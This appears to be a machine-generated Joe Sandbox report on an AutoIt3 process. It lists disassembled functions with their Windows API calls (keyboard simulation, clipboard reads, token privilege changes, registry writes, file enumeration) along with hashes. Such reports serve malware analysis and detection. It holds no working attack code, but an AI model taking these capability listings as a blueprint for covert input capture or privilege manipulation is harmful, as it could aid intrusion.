                                      • Instruction ID: 5dfb65ec4211b1504d7b11591425dfe1f46e7cd184c929c4230eb467ff0a2a64
                                      • Opcode Fuzzy Hash: 9831eed8d6eda24d68a497421f123d12ba3802675b8b2256879e16f8b4b7be92
                                      • Instruction Fuzzy Hash: 539004D5455043114D4555F4CD157C5054CC7DC1D7F150551F134D014CDDCCC1C110F1

                                      Non-executed Functions

                                      Function 0088D164 Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 637windowkeyboardCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 008029E2: GetWindowLongW.USER32(?,000000EB), ref: 008029F3
                                      • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0088D208
                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0088D249
                                      • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0088D28E
                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0088D2B8
                                      • SendMessageW.USER32 ref: 0088D2E1
                                      • _wcsncpy.LIBCMT ref: 0088D359
                                      • GetKeyState.USER32(00000011), ref: 0088D37A
                                      • GetKeyState.USER32(00000009), ref: 0088D387
                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0088D39D
                                      • GetKeyState.USER32(00000010), ref: 0088D3A7
                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0088D3D0
                                      • SendMessageW.USER32 ref: 0088D3F7
                                      • SendMessageW.USER32(?,00001030,?,0088B9BA), ref: 0088D4FD
                                      • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0088D513
                                      • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0088D526
                                      • SetCapture.USER32(?), ref: 0088D52F
                                      • ClientToScreen.USER32(?,?), ref: 0088D594
                                      • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0088D5A1
                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0088D5BB
                                      • ReleaseCapture.USER32 ref: 0088D5C6
                                      • GetCursorPos.USER32(?), ref: 0088D600
                                      • ScreenToClient.USER32(?,?), ref: 0088D60D
                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 0088D669
                                      • SendMessageW.USER32 ref: 0088D697
                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 0088D6D4
                                      • SendMessageW.USER32 ref: 0088D703
                                      • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0088D724
                                      • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0088D733
                                      • GetCursorPos.USER32(?), ref: 0088D753
                                      • ScreenToClient.USER32(?,?), ref: 0088D760
                                      • GetParent.USER32(?), ref: 0088D780
                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 0088D7E9
                                      • SendMessageW.USER32 ref: 0088D81A
                                      • ClientToScreen.USER32(?,?), ref: 0088D878
                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0088D8A8
                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 0088D8D2
                                      • SendMessageW.USER32 ref: 0088D8F5
                                      • ClientToScreen.USER32(?,?), ref: 0088D947
                                      • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0088D97B
                                        • Part of subcall function 008029AB: GetWindowLongW.USER32(?,000000EB), ref: 008029BC
                                      • GetWindowLongW.USER32(?,000000F0), ref: 0088DA17
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                      • String ID: @GUI_DRAGID$F
                                      • API String ID: 3977979337-4164748364
                                      • Opcode ID: 8d9ca990f6192b494e0726eaeb624b8b19c650c6b880b687d0ac05e0d9b42166
                                      • Instruction ID: 96681c23d711c606a32690efdac1d04307d486dc5b832b80a994fa352ff758bc
                                      • Opcode Fuzzy Hash: 8d9ca990f6192b494e0726eaeb624b8b19c650c6b880b687d0ac05e0d9b42166
                                      • Instruction Fuzzy Hash: B6426874204341AFD725EF28C848BAABBE5FF88314F140619FA95C72E1DB71A854DF92
                                      Function 00815EDA Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetForegroundWindow.USER32(00000000,?), ref: 00815EE2
                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 008510D7
                                      • IsIconic.USER32(?), ref: 008510E0
                                      • ShowWindow.USER32(?,00000009), ref: 008510ED
                                      • SetForegroundWindow.USER32(?), ref: 008510F7
                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0085110D
                                      • GetCurrentThreadId.KERNEL32 ref: 00851114
                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00851120
                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 00851131
                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 00851139
                                      • AttachThreadInput.USER32(00000000,?,00000001), ref: 00851141
                                      • SetForegroundWindow.USER32(?), ref: 00851144
                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00851159
                                      • keybd_event.USER32(00000012,00000000), ref: 00851164
                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0085116E
                                      • keybd_event.USER32(00000012,00000000), ref: 00851173
                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0085117C
                                      • keybd_event.USER32(00000012,00000000), ref: 00851181
                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0085118B
                                      • keybd_event.USER32(00000012,00000000), ref: 00851190
                                      • SetForegroundWindow.USER32(?), ref: 00851193
                                      • AttachThreadInput.USER32(?,?,00000000), ref: 008511BA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                      • String ID: Shell_TrayWnd
                                      • API String ID: 4125248594-2988720461
                                      • Opcode ID: aa13bc406c2bf4bfd8a35e09dc3bd1ed6d2123e66c38f4c66266772acb75c266
                                      • Instruction ID: c342f04662b76e15af1e8d05e3d526280137e92f4f97a0d3fa61226d21bdd516
                                      • Opcode Fuzzy Hash: aa13bc406c2bf4bfd8a35e09dc3bd1ed6d2123e66c38f4c66266772acb75c266
                                      • Instruction Fuzzy Hash: 46316271A8031CBEEF216B619C49F7F3E6CFB44B50F154056FE04EA1D1CAB05950AEA0
                                      Function 00858F2E Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00859399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 008593E3
                                        • Part of subcall function 00859399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00859410
                                        • Part of subcall function 00859399: GetLastError.KERNEL32 ref: 0085941D
                                      • _memset.LIBCMT ref: 00858F71
                                      • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00858FC3
                                      • CloseHandle.KERNEL32(?), ref: 00858FD4
                                      • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00858FEB
                                      • GetProcessWindowStation.USER32 ref: 00859004
                                      • SetProcessWindowStation.USER32(00000000), ref: 0085900E
                                      • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00859028
                                        • Part of subcall function 00858DE9: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00858F27), ref: 00858DFE
                                        • Part of subcall function 00858DE9: CloseHandle.KERNEL32(?,?,00858F27), ref: 00858E10
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                      • String ID: $default$winsta0
                                      • API String ID: 2063423040-1027155976
                                      • Opcode ID: e042a6e2781c48b4411fb83d53c955c9111501ed755066e592592b9be6e8d254
                                      • Instruction ID: 9f50d31ec312a5210092bda402353a6e971ce31d2969cf1a623e89e741eabaa7
                                      • Opcode Fuzzy Hash: e042a6e2781c48b4411fb83d53c955c9111501ed755066e592592b9be6e8d254
                                      • Instruction Fuzzy Hash: 50814671840219FFDF21AFA4CC49AAE7B79FF04306F08411AFD50A6261DB368A189F21
                                      Function 00874632 Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • OpenClipboard.USER32(00890980), ref: 0087465C
                                      • IsClipboardFormatAvailable.USER32(0000000D), ref: 0087466A
                                      • GetClipboardData.USER32(0000000D), ref: 00874672
                                      • CloseClipboard.USER32 ref: 0087467E
                                      • GlobalLock.KERNEL32(00000000), ref: 0087469A
                                      • CloseClipboard.USER32 ref: 008746A4
                                      • GlobalUnlock.KERNEL32(00000000,00000000), ref: 008746B9
                                      • IsClipboardFormatAvailable.USER32(00000001), ref: 008746C6
                                      • GetClipboardData.USER32(00000001), ref: 008746CE
                                      • GlobalLock.KERNEL32(00000000), ref: 008746DB
                                      • GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 0087470F
                                      • CloseClipboard.USER32 ref: 0087481F
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                      • String ID:
                                      • API String ID: 3222323430-0
                                      • Opcode ID: b73ed90df45018a79b9ea31db11c79101af34003f54c219adfe7d6dfdf19a92a
                                      • Instruction ID: 8ccc3075f04f7cacda6f171117fe8fcf13835d2cd4982b89efe658a74054b6c5
                                      • Opcode Fuzzy Hash: b73ed90df45018a79b9ea31db11c79101af34003f54c219adfe7d6dfdf19a92a
                                      • Instruction Fuzzy Hash: 4A51BB71244205AFE701FB64DC89F6E77A8FF94B41F04852AF65AD21A1DF30D9048A63
                                      Function 0086CD9F Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FindFirstFileW.KERNEL32(?,?), ref: 0086CDD0
                                      • FindClose.KERNEL32(00000000), ref: 0086CE24
                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0086CE49
                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0086CE60
                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0086CE87
                                      • __swprintf.LIBCMT ref: 0086CED3
                                      • __swprintf.LIBCMT ref: 0086CF16
                                        • Part of subcall function 00811A36: _memmove.LIBCMT ref: 00811A77
                                      • __swprintf.LIBCMT ref: 0086CF6A
                                        • Part of subcall function 008238C8: __woutput_l.LIBCMT ref: 00823921
                                      • __swprintf.LIBCMT ref: 0086CFB8
                                        • Part of subcall function 008238C8: __flsbuf.LIBCMT ref: 00823943
                                        • Part of subcall function 008238C8: __flsbuf.LIBCMT ref: 0082395B
                                      • __swprintf.LIBCMT ref: 0086D007
                                      • __swprintf.LIBCMT ref: 0086D056
                                      • __swprintf.LIBCMT ref: 0086D0A5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                      • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                      • API String ID: 3953360268-2428617273
                                      • Opcode ID: 51dcb5f20c9f70c0e0436a1191cdc40456f37c51e00d4abf5499bd96c4b510e9
                                      • Instruction ID: 74367aa19593920baceba8568800a8f496ba2d0b02879b24b7ac6c286f356d57
                                      • Opcode Fuzzy Hash: 51dcb5f20c9f70c0e0436a1191cdc40456f37c51e00d4abf5499bd96c4b510e9
                                      • Instruction Fuzzy Hash: 21A13AB1508205ABC754EBA8DC85DAFB7ECFF94704F400919F685C6291EB34EA48CB63
                                      Function 0086F5D8 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 0086F5F9
                                      • _wcscmp.LIBCMT ref: 0086F60E
                                      • _wcscmp.LIBCMT ref: 0086F625
                                      • GetFileAttributesW.KERNEL32(?), ref: 0086F637
                                      • SetFileAttributesW.KERNEL32(?,?), ref: 0086F651
                                      • FindNextFileW.KERNEL32(00000000,?), ref: 0086F669
                                      • FindClose.KERNEL32(00000000), ref: 0086F674
                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 0086F690
                                      • _wcscmp.LIBCMT ref: 0086F6B7
                                      • _wcscmp.LIBCMT ref: 0086F6CE
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0086F6E0
                                      • SetCurrentDirectoryW.KERNEL32(008BB578), ref: 0086F6FE
                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 0086F708
                                      • FindClose.KERNEL32(00000000), ref: 0086F715
                                      • FindClose.KERNEL32(00000000), ref: 0086F727
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                      • String ID: *.*
                                      • API String ID: 1803514871-438819550
                                      • Opcode ID: 6f1e3b7b63840f645e48ab10c1eb76f6276ea3b3544348f398fae5daa10c6ff3
                                      • Instruction ID: f888b98cb6b0b041e0319ea50ce3463894bf97419ae083bae6ee6c1aeb19f9bb
                                      • Opcode Fuzzy Hash: 6f1e3b7b63840f645e48ab10c1eb76f6276ea3b3544348f398fae5daa10c6ff3
                                      • Instruction Fuzzy Hash: 4131D0726012196EDF20EFB4EC49AEE77ACFF09321F150166FA15D22A1DB34DA44CE61
                                      Function 00880EB7 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00880FB3
                                      • RegCreateKeyExW.ADVAPI32(?,?,00000000,00890980,00000000,?,00000000,?,?), ref: 00881021
                                      • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00881069
                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 008810F2
                                      • RegCloseKey.ADVAPI32(?), ref: 00881412
                                      • RegCloseKey.ADVAPI32(00000000), ref: 0088141F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Close$ConnectCreateRegistryValue
                                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                      • API String ID: 536824911-966354055
                                      • Opcode ID: 15cef68cc18cdacd16dc9876c0d89139a4d0fc3f5ba9aa0b4203bcdfbdb3dda3
                                      • Instruction ID: a4c2312956319cf7e1a0ffd807ac791a067eb63562970ecf3e19f0dd035de43d
                                      • Opcode Fuzzy Hash: 15cef68cc18cdacd16dc9876c0d89139a4d0fc3f5ba9aa0b4203bcdfbdb3dda3
                                      • Instruction Fuzzy Hash: 500249752006119FCB54EF28C845A2AB7E9FF88714F04895DF95ADB3A2CB34EC41CB92
                                      Function 0086F735 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 0086F756
                                      • _wcscmp.LIBCMT ref: 0086F76B
                                      • _wcscmp.LIBCMT ref: 0086F782
                                        • Part of subcall function 00864875: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00864890
                                      • FindNextFileW.KERNEL32(00000000,?), ref: 0086F7B1
                                      • FindClose.KERNEL32(00000000), ref: 0086F7BC
                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 0086F7D8
                                      • _wcscmp.LIBCMT ref: 0086F7FF
                                      • _wcscmp.LIBCMT ref: 0086F816
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0086F828
                                      • SetCurrentDirectoryW.KERNEL32(008BB578), ref: 0086F846
                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 0086F850
                                      • FindClose.KERNEL32(00000000), ref: 0086F85D
                                      • FindClose.KERNEL32(00000000), ref: 0086F86F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                      • String ID: *.*
                                      • API String ID: 1824444939-438819550
                                      • Opcode ID: d0e51fc5014e63c0d3415e7360a603bf65ed2a27e957d859d8cc26f05038b6b0
                                      • Instruction ID: d19cb74fa141316d79b1ca2c1645a5c03473f5a68326e006b1866b4c710fc51a
                                      • Opcode Fuzzy Hash: d0e51fc5014e63c0d3415e7360a603bf65ed2a27e957d859d8cc26f05038b6b0
                                      • Instruction Fuzzy Hash: E031D5725012196EDF21ABB4EC48ADE776CFF09321F1501B5E914E32A2DB34CA458E60
                                      Function 008588CD Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00858E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00858E3C
                                        • Part of subcall function 00858E20: GetLastError.KERNEL32(?,00858900,?,?,?), ref: 00858E46
                                        • Part of subcall function 00858E20: GetProcessHeap.KERNEL32(00000008,?,?,00858900,?,?,?), ref: 00858E55
                                        • Part of subcall function 00858E20: HeapAlloc.KERNEL32(00000000,?,00858900,?,?,?), ref: 00858E5C
                                        • Part of subcall function 00858E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00858E73
                                        • Part of subcall function 00858EBD: GetProcessHeap.KERNEL32(00000008,00858916,00000000,00000000,?,00858916,?), ref: 00858EC9
                                        • Part of subcall function 00858EBD: HeapAlloc.KERNEL32(00000000,?,00858916,?), ref: 00858ED0
                                        • Part of subcall function 00858EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00858916,?), ref: 00858EE1
                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00858931
                                      • _memset.LIBCMT ref: 00858946
                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00858965
                                      • GetLengthSid.ADVAPI32(?), ref: 00858976
                                      • GetAce.ADVAPI32(?,00000000,?), ref: 008589B3
                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 008589CF
                                      • GetLengthSid.ADVAPI32(?), ref: 008589EC
                                      • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 008589FB
                                      • HeapAlloc.KERNEL32(00000000), ref: 00858A02
                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00858A23
                                      • CopySid.ADVAPI32(00000000), ref: 00858A2A
                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00858A5B
                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00858A81
                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00858A95
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                      • String ID:
                                      • API String ID: 3996160137-0
                                      • Opcode ID: 2668cca5cd13263b91c717e1b84f9f00aa9e9f5b6a1a4bb6e8c3735e0a0569a3
                                      • Instruction ID: c27443c5f145232dcc9a8f1f3bb4e3c707d5205f7f2c58086a17cb6723076051
                                      • Opcode Fuzzy Hash: 2668cca5cd13263b91c717e1b84f9f00aa9e9f5b6a1a4bb6e8c3735e0a0569a3
                                      • Instruction Fuzzy Hash: C8613675900219EFDF01EFA5DC45AAEBBB9FF04301F08812BE815E6290DB359A19CF61
                                      Function 00880A3A Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0088147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0088040D,?,?), ref: 00881491
                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00880B0C
                                        • Part of subcall function 00804D37: __itow.LIBCMT ref: 00804D62
                                        • Part of subcall function 00804D37: __swprintf.LIBCMT ref: 00804DAC
                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00880BAB
                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00880C43
                                      • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00880E82
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00880E8F
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                      • String ID:
                                      • API String ID: 1240663315-0
                                      • Opcode ID: a2840452da932c6dc31c3cf79c04025ae2753014042afa32fef564b0bc17b044
                                      • Instruction ID: 01a43a45fc158f4b4c6333cd93744726790dd7e1bae711aa0eccd3be3efd66c1
                                      • Opcode Fuzzy Hash: a2840452da932c6dc31c3cf79c04025ae2753014042afa32fef564b0bc17b044
                                      • Instruction Fuzzy Hash: 42E15E71204214AFCB54EF28C895E2BBBE9FF89714F04895DF949D72A1DA30E905CF52
                                      Function 00860508 Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetKeyboardState.USER32(?), ref: 00860530
                                      • GetAsyncKeyState.USER32(000000A0), ref: 008605B1
                                      • GetKeyState.USER32(000000A0), ref: 008605CC
                                      • GetAsyncKeyState.USER32(000000A1), ref: 008605E6
                                      • GetKeyState.USER32(000000A1), ref: 008605FB
                                      • GetAsyncKeyState.USER32(00000011), ref: 00860613
                                      • GetKeyState.USER32(00000011), ref: 00860625
                                      • GetAsyncKeyState.USER32(00000012), ref: 0086063D
                                      • GetKeyState.USER32(00000012), ref: 0086064F
                                      • GetAsyncKeyState.USER32(0000005B), ref: 00860667
                                      • GetKeyState.USER32(0000005B), ref: 00860679
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
